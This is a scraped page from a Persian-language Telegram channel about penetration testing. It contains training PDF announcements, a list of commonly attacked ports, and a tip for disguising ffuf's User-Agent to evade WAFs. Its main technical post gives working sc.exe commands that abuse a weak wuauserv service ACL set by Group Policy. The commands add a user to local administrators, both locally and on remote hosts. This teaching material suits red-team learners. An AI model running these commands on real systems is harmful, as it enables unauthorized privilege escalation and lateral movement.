Try Hack Box – Telegram
Try Hack Box
5.76K subscribers
680 photos
65 videos
123 files
689 links
1 Nov 2020
1399/08/11
Learn penetration testing & Red Team
https://youtube.com/@tryhackbox
Channels :
@TryHackBoxOfficial ( RoadMap )
@TryHackBoxStory ( Story Hacking )
Contact : @ThbxSupport
Download Telegram
Printer Hacking 101.pdf
1.7 MB
Printer Hacking 101

با هک چاپگر آشنا شوید و با آن آشنا شوید و اصول اولیه IPP را بدانید.
#PrinterHacking
@TryHackBox
👍8👎1
Hacking with PowerShell @TryHackBox.pdf
1 MB
Hacking with PowerShell

اصول اولیه PowerShell و PowerShell Scripting را بیاموزید.
#powershell
@TryHackBox
5
پیکربندی ناامن ACL های سرویس از طریق group policies

سیاست های گروه ابزار محبوبی برای مدیریت متمرکز زیرساخت های مبتنی بر Active Directory هستند. ابزار Group3r به شما امکان می دهد اطلاعاتی را از سیاست های گروه برای تجزیه و تحلیل بعدی جمع آوری کنید. Group3r همچنین برخی از تنظیمات نادرست را برجسته می کند، بنابراین جستجو با استفاده از کلمات کلیدی red و black برای شناسایی مهم ترین نقص ها راحت است. پست امروز درباره پیکربندی ناامن ACL های سرویس از طریق گروپ پالیسی است.

پس از راه اندازی Group3r و بررسی نتایج، خطوط زیر را یافتیم:
A Windows service's ACL is being configured to grant abusable permissions to a target trustee. This should allow local privilege escalation on affected hosts. Service: wuauserv, Trustee: Authenticated Users - S-1-5-11 .

اگر به خود Group Policy بروید، نام سرویس، نوع راه اندازی و تنظیمات حقوق دسترسی را در قالب یک رشته SSDL پیدا می کنیم:
"wuauserv",4,"D:AR(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCDCLCSWRPWPDTLOCRRC;;;AU)(A;;CCLCSWLOCRRC;;;IU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"

ما فقط به گروه AU علاقه مندیم:

- CC -
حقوق درخواست پیکربندی سرویس.
- DC -
حقوق تغییر سرویس.
- LC -
حقوق درخواست وضعیت سرویس ها؛
- SW -
حقوق فهرست کردن تمام خدمات وابسته به سرویس
- RP - حقوق شروع سرویس؛
- WP - حقوق توقف سرویس؛
- DT - حقوق توقف سرویس.
- LO – حقوقی که به شما امکان می دهد از سرویس بخواهید فورا وضعیت شما را گزارش کند.
- CR - حقوق تعیین کد کاربر عنصر کنترل.
- RC - حقوق خواندن توصیفگرهای امنیتی.

ابتدا باید تعیین کنید که این خط مشی گروه روی کدام کامپیوترها اعمال می شود.

MATCH(g:GPO {name:"VULNSERVICE@DOMAIN.LOCAL"})-[:GPLink|Contains*1..]->(c:Computer) RETURN c.name


اگر میزبان فعلی ما یا میزبانی که به آن دسترسی راه دور داریم این خط مشی را اعمال می کند، پیکربندی سرویس فعلی را در رایانه محلی پرس و جو می کنیم:
sc.exe qc wuauserv

ما مقدار فعلی پارامتر BINARY_PATH_NAME را برای بازیابی بعدی ذخیره می کنیم.
ما پارامتر BINARY_PATH_NAME را به کاری که می‌خواهیم در رایانه انجام دهیم تغییر می‌دهیم، برای مثال، خود را به گروه مدیران لوکال یا local administrators اضافه می‌کنیم.

sc.exe config wuauserv binPath= "net.exe localgroup administrators victim /add"

سرویس را شروع کنید:
sc.exe start wuauserv

اگر سرویس راه اندازی شده است، ابتدا باید آن را متوقف کنید و سپس آن را شروع کنید:
sc.exe stop wuauserv
sc.exe start wuauserv


در حالی که Group3r گزارش می دهد که این نقص می تواند برای افزایش دسترسی لوکال استفاده شود، در برخی موارد می توان از آن برای افزایش دسترسی از راه دور و lateral movement نیز استفاده کرد.

ما یک بررسی ساده انجام می دهیم، مانند راه اندازی یا نصب یک سرویس در یک میزبان راه دور:
sc.exe \\server start wuauserv

اگر خطای Access Denied ظاهر نشد، بیایید سعی کنیم خود را به گروه مدیران لوکال اضافه کنیم و سرویس را راه اندازی کنیم:
sc.exe \\server config wuauserv binPath= "net.exe localgroup administrators victim /add"
sc.exe \\server start wuauserv

پس از به دست آوردن دسترسی  local administrator، پارامتر BINARY_PATH_NAME را به حالت اولیه خود برگردانید.

#RedTeam #PurpleTeam #LPE
@TryHackBox
👍5🔥3
Media is too big
VIEW IN TELEGRAM
Pro's vs. Joes @Home Edition Presents: "Building A Monster Lab" w/ Jeff McJunkin

چگونه یک لابراتور برای خودمون بسازیم
#Lab
@TryHackBox
👍8
This media is not supported in your browser
VIEW IN TELEGRAM
💡آنتی ویروس چگونه کار می کند؟
#Av
@TryHackBox
👍9🎉1
دوستان به زودی فعالیتمون در یوتیوب شروع میشه خوشحال میشم حمایتمون کنید به زودی ...
فعالیتمون در یوتیوب مباحث تست نفوذ شبکه هست
👌19👍3
هنری که با خرد همراه نباشد، همچو مرگی که است که بر تن چیره گشته…
«برگرفته از اندرزنامه پهلویِ دستور آذرباد ماراسپندان»
@TryHackBox
9
Full Introduction to Cyber Security TryHackBox .pdf
2.3 MB
📖 مقدمه ای بر امنیت سایبری
🧩 #امنیت_سایبری
@TryHackBox
👍10
Full Introduction to Cyber Security TryHackBox.pdf
2.1 MB
📖 مقدمه ای بر امنیت سایبری
🧩 #امنیت_سایبری
توسط : TryHackBox
@TryHackBox
👍7
Try Hack Box
Full Introduction to Cyber Security TryHackBox.pdf
نسخه قبلی دوستان گقتند واترمارکش پررنگه تو این نسخه اصلاح شد
7
به کدام حوزه تست نفوذ و امنیت علاقه مند هستید ؟
Final Results
23%
تست نفوذ شبکه
33%
تست نفوذ وب
34%
هردو
10%
امنیت شبکه
8
Forwarded from TryHackBox
دوستان ما قصد داریم کتابهایی رو در زمینه حوزه تهاجمی هست رو ترجمه کنیم برای اینکار تصمیم گرفتیم که یک تیم تشکیل بدیم تا بتوانیم به جامعه سایبری پارسی زبان کمک کنیم و ارائه هایی خوبی برای علاقه مندان داشته باشیم .

اگر دوست دارید کمک کنید و زبان خوبی ندارید میتونید از ترنسلیت استفاده کنید ما در اخر مطالب را ویرایش میکنیم و مطالبی که ترجمه تخصصی نشدند را اصلاح میکنیم .


اگر مایل به پیوستند به تیم ما هستید با ما در ارتباط باشید :

🔆
@Unique_exploitBot
👍6🔥4
Forwarded from Try Hack Box (Sʜᴀʀᴋ Dᴀʀᴋ)
دوستان اینو یادتون باشه دوره های امنیت با امنیت شروع نمیشه.


@TryHackBox
👍132
🔖 40 پورت معمولاً هدفمند توسط هکرها

    🔒 Port 21 (FTP)
    🚪 Port 22 (SSH)
    💻 Port 23 (Telnet)
    📧 Port 25 (SMTP)
    🌐 Port 53 (DNS)
    🌐 Port 80 (HTTP)
    🔒 Port 443 (HTTPS)
    🎮 Port 3074 (Xbox Live)
    📲 Port 5060 (SIP)
    🎲 Port 8080 (Proxy)
    📁 Port 135 (RPC)
    🖥️ Port 139 (NetBIOS)
    🔓 Port 1433 (MSSQL)
    🎲 Port 1521 (Oracle)
    🔓 Port 1723 (PPTP)
    📤 Port 1900 (UPnP)
    🎮 Port 2302 (DayZ)
    🖨️ Port 3389 (RDP)
    🔒 Port 3306 (MySQL)
    🕸️ Port 4000 (Elasticsearch)
    📂 Port 4444 (Metasploit)
    📤 Port 5000 (Python Flask)
    🎮 Port 5555 (Android Debug Bridge)
    📤 Port 5900 (VNC)
    🖥️ Port 6667 (IRC)
    📧 Port 6697 (IRC SSL)
    📂 Port 8000 (HTTP Alt)
    🖥️ Port 8081 (HTTP Proxy)
    🔓 Port 9100 (Printer)
    📂 Port 9090 (Web Debugging)
    📁 Port 445 (SMB)
    💻 Ports 5985/5986 (WinRM)
    🔄 Port 6379 (Redis)
    📂 Port 6666 (IRC)
    📧 Port 993 (IMAP SSL)
    🔒 Port 995 (POP3 SSL)
    🎲 Port 1434 (Microsoft SQL Monitor)
    📂 Port 27017 (MongoDB)
    🌐 Port 28017 (MongoDB HTTP Interface)
#Port
@TryHackBox
👍17🔥4
برای آنکه به بدی و (خساست) شهرت نیابید آنچه را که از آموزگاران خود آموختید با سخاوت و رادی به دیگران عرضه دارید.
«بخشی از نسک سومِ دینکردِ پاک»
@TryHackBox
👍27
This media is not supported in your browser
VIEW IN TELEGRAM
۷ آبان ماه، روز کوروش بزرگ
پدر ایران زمین
خجسته باد .

دوشنبه (مه‌شید) هفتم، روز امرداد از ماه آبان، روز پدر ایرانشهر، روز کوروش بزرگ، شاه ایران، شاه چهارگوشه، بر هماک بهدینان و نیکان و خوبان ایران و انیران شاد بواد.

@TryHackBox
9👎3👍1
🔖 نکات باگ بانتی

🥷 هنگام استفاده از ffuf یا ابزارهای دیگر (که در هر درخواست یک User-Agent می فرستند)، هیچ کس فکر نمی کند که هدرهای HTTP پیش فرض (Fuzz Faster U Fool در مورد ffuf) می توانند WAF را مسدود کنند. فقط آن را به چیزی شبیه به:


-H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"


#bugbounty #tips #recon
@TryHackBox
👍82
RoadMap For Network Penetration Testing By TryHackBox.pdf
30.7 KB
نقشه راه تست نفوذ شبکه

🔖 یک نکته : به ترتیب نیاز نیست همشو برید این یک نگاه کلی هست که اینایی که داخلش هست رو بلد باشید دوستان .

✍️ Kaveh
@TryHackBoxOfficial
🔥9